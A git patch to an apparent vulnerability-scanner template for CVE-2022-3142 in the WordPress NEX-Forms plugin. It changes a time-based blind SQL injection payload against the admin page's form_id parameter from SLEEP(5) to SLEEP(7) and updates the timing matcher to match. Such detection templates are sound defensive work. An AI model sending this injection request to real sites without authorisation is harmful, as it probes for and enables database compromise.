From baa1acee95204e6bfd5be9dd47933396b0daa0d2 Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Tue, 6 Feb 2024 23:37:02 +0800 Subject: [PATCH] Update CVE-2022-3142.yaml --- http/cves/2022/CVE-2022-3142.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index d7a69d51d5..2caaca0be1 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -40,15 +40,15 @@ http: log={{username}}&pwd={{password}}&wp-submit=Log+In - | @timeout: 30s - GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)-- HTTP/1.1 + GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - - 'duration>=5' + - 'duration>=7' - 'status_code_2 == 200' - 'contains(body_2, "NEX-Forms")' - 'contains(content_type_2, "text/html")' condition: and -# digest: 4a0a00473045022100ec8d29550d341798ac1467f8d80b0c7a09e6169593e8d7cc4576dbee2214e27f0220057ac57665c9e34ea9d98b588526a3be8fdef7a5e636f863993e15cf5f07ab55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec8d29550d341798ac1467f8d80b0c7a09e6169593e8d7cc4576dbee2214e27f0220057ac57665c9e34ea9d98b588526a3be8fdef7a5e636f863993e15cf5f07ab55:922c64590222798bb761d5b6d8e72950